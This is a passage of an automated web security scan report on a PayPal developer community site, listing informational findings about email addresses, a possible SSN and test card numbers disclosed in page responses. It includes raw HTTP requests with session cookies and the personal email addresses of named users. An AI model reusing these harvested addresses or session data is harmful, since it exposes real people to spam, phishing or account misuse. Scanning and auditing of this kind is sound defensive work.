Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:27 GMT; Path=/
Vary: User-Agent
JP: D=61141 t=1313157507100954
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a class="jive-link-email-small" href="mailto:hitesh_1312610572_per@gmail.com">hitesh_1312610572_per@gmail.com</a>
...[SNIP]...

8.22. https://www.x.com/message/215254  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215254

Issue detail

The following email addresses were disclosed in the response:

Request

GET /message/215254 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35343035383b312c35333137323b312c35333235323b312c35333135383b312c34373636333b312c35333331323b312c35333331393b312c35333037353b312c35333334333b312c35333539323b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:37 GMT; Path=/
Vary: User-Agent
JP: D=103642 t=1313157517314351
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a class="jive-link-email-small" href="mailto:contact@XXXXXXX.com">contact@XXXXXXX.com</a>
...[SNIP]...
<a class="jive-link-email-small" href="mailto:contact@YYYYYYY.com">contact@YYYYYYY.com</a>
...[SNIP]...
<a class="jive-link-email-small" href="mailto:contact@XXXXXXX.com">contact@XXXXXXX.com</a>
...[SNIP]...
<a class="jive-link-email-small" href="mailto:contact@YYYYYYY.com">contact@YYYYYYY.com</a>
...[SNIP]...

8.23. https://www.x.com/message/215291  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215291

Issue detail

The following email addresses were disclosed in the response:

Request

GET /message/215291 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c34373636333b312c35343035383b312c35333137323b312c35333135383b312c35333235323b312c35333331323b312c35333331393b312c35333037353b312c35333334333b312c35333539323b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:37 GMT; Path=/
Vary: User-Agent
JP: D=173612 t=1313157516935709
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a class="jive-link-email-small" href="mailto:akhi.p_1272864268_per@gmail.com">akhi.p_1272864268_per@gmail.com</a>
...[SNIP]...
<a class="jive-link-email-small" href="mailto:User&amp;notify_version=3.0&amp;custom=&amp;payer_status=verified&amp;business=akhi.p_1272864268_per@gmail.com">User&amp;notify_version=3.0&amp;custom=&amp;payer_status=verified&amp;business=akhi.p_1272864268_per@gmail.com</a>
...[SNIP]...
<a class="jive-link-email-small" href="mailto:Jose&amp;quantity=1&amp;payer_email=akhile_1242918801_per@cubettech.com">Jose&amp;quantity=1&amp;payer_email=akhile_1242918801_per@cubettech.com</a>
...[SNIP]...
href="mailto:&amp;verify_sign=Az8BELGp90v9Bz5-R7AT7rZ4ePtgA2Y.xzE-cEw3vIo7ktKgCn16cEmT&amp;txn_id=7Y89480459745843E&amp;payment_type=instant&amp;last_name=User&amp;address_state=CA&amp;receiver_email=akhi.p_1272864268_per@gmail.com">&amp;verify_sign=Az8BELGp90v9Bz5-R7AT7rZ4ePtgA2Y.xzE-cEw3vIo7ktKgCn16cEmT&amp;txn_id=7Y89480459745843E&amp;payment_type=instant&amp;last_name=User&amp;address_state=CA&amp;receiver_email=akhi.p_1272864268_per@gmail.com</a>
...[SNIP]...
<a class="jive-link-email-small" href="mailto:xxxx@xxxx.com&amp;quot;/">xxxx@xxxx.com"/</a>
...[SNIP]...

8.24. https://www.x.com/people/BaldGeek  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/BaldGeek

Issue detail

The following email address was disclosed in the response:

Request

GET /people/BaldGeek HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/xcommerce-blogs?view=blog
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323237363b31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:38:49 GMT; Path=/
Vary: User-Agent
JP: D=151430 t=1313156329683258
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<span>
naveedanwar@gmail.com
</span>
...[SNIP]...

8.25. https://www.x.com/people/BaldGeek.vcf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/BaldGeek.vcf

Issue detail

The following email address was disclosed in the response:

Request

GET /people/BaldGeek.vcf HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/x-vcard;charset=UTF-8
Content-Language: en-US
JP: D=5452 t=1313157111270263
Vary: User-Agent
Connection: close

BEGIN:VCARD
VERSION:3.0
FN:Naveed Anwar
ORG:PayPal
EMAIL;TYPE=internet:naveedanwar@gmail.com
TZ:Pacific Standard Time
URL:http://x.com
END:VCARD

8.26. https://www.x.com/people/CorinneSherman  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/CorinneSherman

Issue detail

The following email address was disclosed in the response:

Request

GET /people/CorinneSherman HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c38393433393b332c323030383b332c35333735313b332c35333436333b332c35353331393b332c35333437343b332c35373137393b332c3133363935343b332c3133373131353b332c36303039313b; Expires=Sun, 11-Sep-2011 13:51:54 GMT; Path=/
Vary: User-Agent
JP: D=153786 t=1313157114086096
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<span>
csherman@paypal.com
</span>
...[SNIP]...

8.27. https://www.x.com/people/PayPal_Sudha  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPal_Sudha

Issue detail

The following email address was disclosed in the response:

Request

GET /people/PayPal_Sudha HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333436333b332c36303039313b332c323030383b332c35333437343b332c3133363935343b332c3133373131353b332c35333735313b332c3133383538323b332c3133373331333b332c35353331393b; Expires=Sun, 11-Sep-2011 13:51:52 GMT; Path=/
Vary: User-Agent
JP: D=104130 t=1313157112744233
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a id="web_viewprofile_anchor_email" href="mailto:sujamthe@paypal.com" class="email">sujamthe@paypal.com</a>
...[SNIP]...

8.28. https://www.x.com/people/angelleye  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/angelleye

Issue detail

The following email address was disclosed in the response:

Request

GET /people/angelleye HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c323430323b332c3133373331333b332c3133313833303b332c3133363236393b332c31323739393b332c3133373135383b332c3132393239303b332c3133393730313b332c3132323335343b332c3133343430323b; Expires=Sun, 11-Sep-2011 13:52:14 GMT; Path=/
Vary: User-Agent
JP: D=188523 t=1313157134358773
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<span>
service@angelleye.com
</span>
...[SNIP]...

8.29. https://www.x.com/people/encore  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/encore

Issue detail

The following email address was disclosed in the response:

Request

GET /people/encore HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c31303939373b332c3133363236393b332c31323739393b332c323839313b332c323430323b332c3133313833303b332c323032353b; Expires=Sun, 11-Sep-2011 13:52:17 GMT; Path=/
Vary: User-Agent
JP: D=147969 t=1313157137124462
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a id="web_viewprofile_anchor_email" href="mailto:sliddicoat@encoresystems.net" class="email">sliddicoat@encoresystems.net</a>
...[SNIP]...

8.30. https://www.x.com/resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js

Issue detail

The following email address was disclosed in the response:

Request

GET /resources/scripts/gen/0342f095f845975ee379e3b661a48c71.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.x.com/community/ppx/ec
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7238D44EFB679CF81CE553C3866BE5EA.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 01:59:40 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 654029
JP: D=354 t=1313114380766811
Vary: User-Agent
Connection: close

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...
<support@zapatec.com>
...[SNIP]...

8.31. https://www.x.com/resources/scripts/gen/0f8d77797a32adc104814eaff10722a0.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /resources/scripts/gen/0f8d77797a32adc104814eaff10722a0.js

Issue detail

The following email address was disclosed in the response:

Request

GET /resources/scripts/gen/0f8d77797a32adc104814eaff10722a0.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.x.com/community/ppx/xspaces?view=documents
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b332c3133343430323b332c3133393730313b332c3132323335343b332c3134303635343b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:49 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 654809
JP: D=647 t=1313156390522448
Vary: User-Agent
Connection: close

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...
<support@zapatec.com>
...[SNIP]...

8.32. https://www.x.com/resources/scripts/gen/45658bd430e6cc0d6bfb5e49ad19ad72.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /resources/scripts/gen/45658bd430e6cc0d6bfb5e49ad19ad72.js

Issue detail

The following email address was disclosed in the response:

Request

GET /resources/scripts/gen/45658bd430e6cc0d6bfb5e49ad19ad72.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.x.com/docs/DOC-1106
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c313130363b3130322c333831313b332c38383139383b332c3133383934323b332c38373839383b332c3134303532383b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:40:09 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 981912
JP: D=369 t=1313156410569291
Vary: User-Agent
Connection: close

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...
<support@zapatec.com>
...[SNIP]...

8.33. https://www.x.com/resources/scripts/gen/5e8daa65eff08c12130590779b690338.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /resources/scripts/gen/5e8daa65eff08c12130590779b690338.js

Issue detail

The following email address was disclosed in the response:

Request

GET /resources/scripts/gen/5e8daa65eff08c12130590779b690338.js HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/index.jspa
Cookie: JSESSIONID=2AE31D5B697BAD75797FFFBF88CC8F17.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e27151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 01:59:26 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 648777
JP: D=18063 t=1313114366859700
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

/*!
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02
...[SNIP]...
<support@zapatec.com>
...[SNIP]...

8.34. https://www.x.com/resources/scripts/gen/765a2586e97f57ed78f41f85e9e04f27.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /resources/scripts/gen/765a2586e97f57ed78f41f85e9e04f27.js

Issue detail

The following email address was disclosed in the response:

Request

GET /resources/scripts/gen/765a2586e97f57ed78f41f85e9e04f27.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.x.com/people/BaldGeek
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:50 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 657477
JP: D=368 t=1313156330206991
Vary: User-Agent
Connection: close

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...
<support@zapatec.com>
...[SNIP]...

8.35. https://www.x.com/resources/scripts/gen/912eca7a559d6800dd49c65b5a8a3f0d.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /resources/scripts/gen/912eca7a559d6800dd49c65b5a8a3f0d.js

Issue detail

The following email address was disclosed in the response:

Request

GET /resources/scripts/gen/912eca7a559d6800dd49c65b5a8a3f0d.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.x.com/community/xcommerce-blogs?view=blog
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323237363b31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:43 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Vary: User-Agent
Content-Type: text/javascript
JP: D=43847 t=1313156323842940
Connection: close

if(dwr==null){var dwr={}}if(dwr.engine==null){dwr.engine={}}if(DWREngine==null){var DWREngine=dwr.engine}dwr.engine.setErrorHandler=function(a){dwr.engine._errorHandler=a};dwr.engine.setWarningHandler
...[SNIP]...
<support@zapatec.com>
...[SNIP]...

8.36. https://www.x.com/themes/paypal/js/custom.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /themes/paypal/js/custom.js

Issue detail

The following email address was disclosed in the response:

Request

GET /themes/paypal/js/custom.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.x.com/community/ppx/ec
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7238D44EFB679CF81CE553C3866BE5EA.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 01:59:40 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2016000, public
Content-Type: text/javascript
Content-Length: 31770
JP: D=418 t=1313114381172952
Vary: User-Agent
Connection: close

/**
* DD_roundies, this adds rounded-corner CSS in standard browsers and VML sublayers in IE that accomplish a similar appearance when comparing said browsers.
* Author: Drew Diller
* Email: drew.diller@gmail.com
* URL: http://www.dillerdesign.com/experiment/DD_roundies/
* Version: 0.0.2a - preview 2008.12.26
* Licensed under the MIT License: http://dillerdesign.com/experiment/DD_roundies/#license
*
* Usage:

...[SNIP]...

9. Social security numbers disclosed  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://www.x.com
Path:   /docs/DOC-3251

Issue detail

The following social security number was disclosed in the response:

Issue background

Responses containing social security numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid SSNs and whether their disclosure within the application is appropriate.

Request

GET /docs/DOC-3251 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333235313b3130322c333432373b3130322c333337353b3130322c333432363b3130322c333433313b3130322c333434333b3130322c333439313b3130322c333434343b3130322c333536313b3130322c333536323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:55 GMT; Path=/
Vary: User-Agent
JP: D=152122 t=1313157235677820
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a class="jive-link-external-small" href="/servlet/JiveServlet/downloadBody/2724-102-10-3104/PayPalApp.pdf">
...[SNIP]...
<a class="jive-link-external-small" href="/servlet/JiveServlet/downloadBody/2724-102-10-3104/PayPalApp.pdf">
...[SNIP]...

10. Credit card numbers disclosed  previous  next
There are 2 instances of this issue:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.


10.1. https://www.x.com/community/feeds/documents  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/feeds/documents

Issue detail

The following credit card numbers were disclosed in the response:

Request

GET /community/feeds/documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:09 GMT
Server: Apache-Coyote/1.1
Last-Modified: Thu, 11 Aug 2011 22:17:57 GMT
Etag: "1313101077659"
Content-Type: text/xml;charset=UTF-8
Content-Language: en-US
JP: D=39783 t=1313157009161570
Cache-Control: no-cache, private
Vary: User-Agent
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:clearspace="http://www.jivesoftware.com/xmlns/clearspace/rss" xmlns:rdf="http://www.w3.org/1
...[SNIP]...
mall" href="https://www.x.com/docs/DOC-1642"&gt;post&lt;/a&gt; regarding using the Request ID.&lt;br/&gt;&lt;br/&gt;Example:&lt;br/&gt;&lt;br/&gt;TRXTYPE=S&amp;amp;TENDER=C&amp;amp;AMT=11&amp;amp;ACCT=4012888888881881&amp;amp;EXPDATE=0119&amp;amp;&lt;br/&gt;INVNUM=PONUM1&amp;amp;VERBOSITY=HIGH&amp;amp;STREET=123 Main St&amp;amp;&lt;br/&gt;PONUM=010001&amp;amp;&lt;strong&gt;ORDERID=1ef2ca34bc24e66fa&lt;br/&gt;&lt;/s
...[SNIP]...
the following items: TRXTYPE, TENDER, ACCT and EXPDATE.&lt;br/&gt;&lt;br/&gt;Example:&lt;br/&gt;&lt;br/&gt;&lt;strong style="color: #ff0000; "&gt;TRXTYPE=L&lt;/strong&gt;&amp;amp;TENDER=C&amp;amp;ACCT=5105105105105100&amp;amp;EXPDATE=1212&amp;amp;&lt;br/&gt;FIRSTNAME=Ted&amp;amp;LASTNAME=Smith&amp;amp;STREET=123 Main Street&amp;amp;City=San Jose&amp;amp;&lt;br/&gt;STATE=CA&amp;amp;ZIP=12345&amp;amp;PHONE=123-123-12
...[SNIP]...
ofile to run every day for X number of Days.&lt;br/&gt;&lt;br/&gt;Example:&lt;br/&gt;TRXTYPE=R&amp;amp;TENDER=C&amp;amp;ACTION=A&amp;amp;PROFILENAME=MyProfile&amp;amp;AMT=20.00&amp;amp;&lt;br/&gt;ACCT=4111111111111111&amp;amp;EXPDATE=0213&amp;amp;START=01252010&amp;amp;&lt;strong style="color: #ff0000; "&gt;PAYPERIOD=DAYS&lt;br/&gt;&lt;/strong&gt;&amp;amp;TERM=2&amp;amp;COMMENT1=First-time customer&amp;amp;OPTIONAL
...[SNIP]...
